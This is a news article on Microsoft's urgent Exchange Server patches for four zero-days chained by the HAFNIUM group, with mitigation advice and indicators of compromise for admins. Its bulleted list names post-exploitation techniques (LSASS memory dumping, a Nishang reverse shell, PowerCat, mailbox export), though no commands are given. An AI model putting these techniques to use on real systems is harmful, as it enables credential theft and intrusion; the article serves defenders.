Microsoft Pushes Urgent Updates for Exchange Server After the Discovery of Multiple 0-Days

  • Microsoft has fixed several 0-day flaws that Chinese hackers were exploiting.
  • The vulnerabilities were chained together to achieve a high-level compromise, data access, and exfiltration.
  • The actors went on undeterred for at least two months already, so updating now is exigent.

Microsoft has confirmed the existence of multiple 0-day exploits on the Exchange Server that are being actively used by an actor called “HAFNIUM.” This is a group of hackers that primarily targets US-based entities and is believed to be supported by the Chinese group supported by the state.

While the attacks appear to be limited according to Microsoft, they were very damaging, as the hackers may have accessed email accounts through compromised Exchange servers, could have installed malware, and may have planted web shell backdoors to help them move around.

The IDs of the newly discovered 0-days are CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which were addressed in the latest update. The affected MS Exchange Server versions include 2013, 2016, and also 2019. The actors have chained these flaws to carry out a powerful attack, which is indicative of their sophistication. Microsoft has also discovered and fixed CVE-2021-26412, CVE-2021-26854, and CVE-2021-27078, but these three aren’t related to the HAFNIUM attacks.

If you’re unable to apply the fixing patch right now, you may apply the mitigation of setting up a VPN to separate the Exchange server from external access. Note that this will only stop the first step of the attack, which is to establish an untrusted connection to Exchange server port 443. Still, it may be enough to cause a disruption. If the attacker has already compromised your server, though, this mitigation won’t make any difference whatsoever.

As Microsoft details, HAFNIUM performed the following post-exploitation activity:

  • Used Procdump to dump the LSASS process memory
  • Used 7-Zip to compress and exfiltrate stolen data
  • Added and used Exchange PowerShell snap-ins to export mailbox data
  • Used the Nishang Invoke-PowerShellTcpOneLine reverse shell
  • Downloaded PowerCat straight from GitHub and used it to open a remote server connection

Thus, if you are an Exchange server admin, consider the above signs of trouble and actively scan your log files to detect any indicators of compromise. If you see any ZIPs, RARs, or 7z files on C:\ProgramData\, consider your data exfiltrated. According to Microsoft, the actors like to download the Exchange offline address book, so they grab organization and user information too.

If you find that you’re already under attack by HAFNIUM, check out this piece to figure out how to develop effective defending mechanisms. The most urgent action to take right now, though, is to update all externally facing Exchange Servers.

Finally, according to a blog post by Volexity researchers, who were the ones to discover these attacks and report them to Microsoft, the first signs of active exploitation of the aforementioned flaws appeared as far back as January 6, 2021.



How to Watch Formula 1 Without Cable in 2021: Live Stream F1 Grand Prix Anywhere!

The 2021 Formula 1 World Championship is nearly underway, and we're excited to see the big names on the circuit once more,...

How to watch NFL Draft 2021 Without Cable: Date, Time, Schedule, Pick Order, Location, Mock Drafts

The 2021 NFL Draft is almost upon us, and soon the top prospects in the world of football will know where they...

How to Watch NHL 2021 Without Cable – Live Stream Hockey Online from Anywhere

The 2021 NHL season is here, and it ongoing after getting a dodgy start. The 104th season of the National Hockey League...